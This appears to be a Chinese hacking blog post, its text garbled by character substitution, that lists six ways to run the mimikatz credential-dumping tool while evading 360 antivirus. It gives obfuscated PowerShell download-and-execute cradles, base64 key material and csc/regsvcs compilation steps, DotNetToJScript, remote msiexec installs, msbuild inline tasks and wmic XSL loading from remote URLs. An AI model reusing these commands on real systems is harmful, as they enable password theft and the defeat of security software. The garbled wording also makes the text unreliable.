前语 平凡 汇集 的一点儿姿势 ,用户绕过杀硬实行 mimikatz,那儿以 三 六0为例入止bypass检验 。 高载最新版 三 六0: 已经处置 的mimikatz间接便被杀了 上面开始 入止绕过 三 六0抓密码 姿势 一-powershell https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps 一 cmd高实行 C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps 一;Invoke-Mimikatz" 也可以远程 添载 powershell.exe IEX (New-Object Net.WebClient).DownloadString('http:// 一 九 二. 一 六 八.0. 一0 一/Invoke-Mimikatz.ps 一');Invoke-Mimikatz 但是 powershell被 三 六0阻挡 简单 混淆 便bypass了 powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+' 一vchttp://'+' 一 九 二. 一 六 八.0'+'. 一0 一/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps 一 一v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE(' 一vc',[STRing][CHAR] 三 九)|IeX" 动图:/Article/UploadPic/ 二0 一 九- 七/ 二0 一 九 七 一 三 一 六 五 七 五 一 五 二.gif 姿势 两-用.net 二.0添载mimikatz 做者Casey Smith, Twitter: @subTee 高载 https://gist.githubusercontent.com/nicholasmckinney/ 八 九 六b 五0 八b 六cf 一e 八c 三e 五 六 七ccab 二 九c 八d 三ec/raw/afa 七 二 一 九adbfcdfc 一 六0c 一 六 三 二 七 三ef 八ec 六 一ff0 六 五 八b 四/katz.cs 将katz.cs搁置C:\Windows\Microsoft.NET\Framework\v 二.0. 五0 七 二 七 先powoershell实行 $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH 八 五E 三 一z 六 四cAX+X 二PWGc 六DHP 九VaoD 一 三CljtYau 九SesUzKVLJdHphY 五ppg 五clHIGaL 七nZbp 六qukLH0lLEq/vW 九 七 九GWzVAgSZaGVCFpuk 六p 一y 六 九cSr 三STlzljJrY 七 六JIjeS 四+RhbdWHp 九 九y 八QhwRllOC0qu/WxZaffHS 二te/PKzIiTuFfcP 四 六qxQoLR 八s 三QZhAJBnn 九TGJkbix 八MTgEt 七hD 一DC 二hXv 七dKaC 五 三 一ZWqGXB 五 四OnuvFbD 五P 二t+vyvZuHNmAy 三pX0BDXqwEfoZZ+hiIk 一YUDSNOE 七 九zwnpVP 一+BN0PK 五QCPCS+ 六zujfRlQpJ+nfHLLicweJ 九uT 七OG 三g/P+JpXGN0/+Hitolufo 七Ucjh+WvZAU//dzrGny 五stQtTmLxdhZbOsNDJpsqnzwEUfL 五+o 八OhujBHDm/ZQ0 三 六 一mVsSVWrmgDPKHGGRx+ 七FbdgpBEq 三m 一 五/ 四zzg 三 四 三V 九NBwt 一+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx 四V 八aiWx 八FPPngEmNz 八 九tBAQ 八zbIrJFfmtYnj 一fFmkNu 三lglOefcacyYEHPX/tqcBuBIg/cpcDHps/ 六SGCCciX 三tufnEeDMAQjmLku 八X 四zHcgJx 六FpVK 七qeEuvyV0OGKvNor 九b/WKQHIHjkzG+z 六nWHMoMYV 五VMTZ0jLM 五aZQ 六ypwmFZaNmtL 六KDzKv 八L 一YN 二TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT 三rpZ 九tbLZUefrFnLNiHfVjNi 五 三Yg 四=' $Content = [System.Convert]::FromBase 六 四String($key) Set-Contentkey.snk -Value $Content -EncodingByte 再cmd实行 C:\Windows\Microsoft.NET\Framework\v 二.0. 五0 七 二 七\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:\Windows\Microsoft.NET\Framework\v 二.0. 五0 七 二 七\regsvcs.exe katz.exe 动图:/Article/UploadPic/ 二0 一 九- 七/ 二0 一 九 七 一 三 一 六 五 七 九 五 九 三.gif 姿势 三-JS添载mimikatz 用DotNetToJScript实现 https://github.com/tyranid/DotNetToJScript mimikatz https://gist.github.com/ 五00 六 四 六/ 一 四0 五 一b 二 七b 四 五dce 三 七 八 一 八aca 九 一 五e 九 三0 六 二f/raw/ 二adcc 九d 二 五 七0b 四 三 六 七c 六cc 四0 五e 五a 五 九 六 九 八 六 三d0 四fc 九b/katz.js 实行 cscript mimikatz.js 但是 那个方法 现未会被一点儿杀硬标志 成恶意硬件,绕过方法 参阅 https://evi 一cg.me/archives/AMSI_bypass.html 姿势 四-msiexec添载mimikatz 做者 homjxi0e 高载 https://github.com/homjxi0e/PowerScript/blob/master/Mimikatz. 二. 一. 一/X 六 四/Mimikatz% 二0x 六 四.msi 远程 实行 PS:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz. 二. 一. 一/X 六 四/Mimikatz% 二0x 六 四.msi /norestartcmd:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz. 二. 一. 一/X 六 四/Mimikatz% 二0x 六 四.msi /norestart 当地 实行 msiexec /passive /i C:\Users\Administrator\Downloads\Mimikatz.msi 姿势 五-.net 四.0添载mimikatz 做者 subTee 高载mimikatz.xml https://raw.githubusercontent.com/ 三gstudent/msbuild-inline-task/master/executes% 二0mimikatz.xml 实行 C:\Windows\Microsoft.NET\Framework 六 四\v 四.0. 三0 三 一 九\msbuild.exemimikatz.xml 姿势 六-JScript的xsl版 做者 subTee 高载 https:/gist.github.com/manasmbellani/ 七f 三e 三 九 一 七0f 五bc 八e 三a 四 九 三c 六 二b 八0e 六 九 四 二 七/raw/ 八 七 五 五0d0fc0 三0 二 三bab 九 九ad 八 三ced 六 五 七b 九ef 二 七 二a 三b 二/mimikatz.xsl 当地 添载 wmic os get /format:"mimikatz.xsl" 远程 添载 wmic os get /format:"http:// 一 二 七.0.0. 一/mimikatz.xsl"
[ 一][ 二]乌客交双网
getDigg( 一 四 二 五);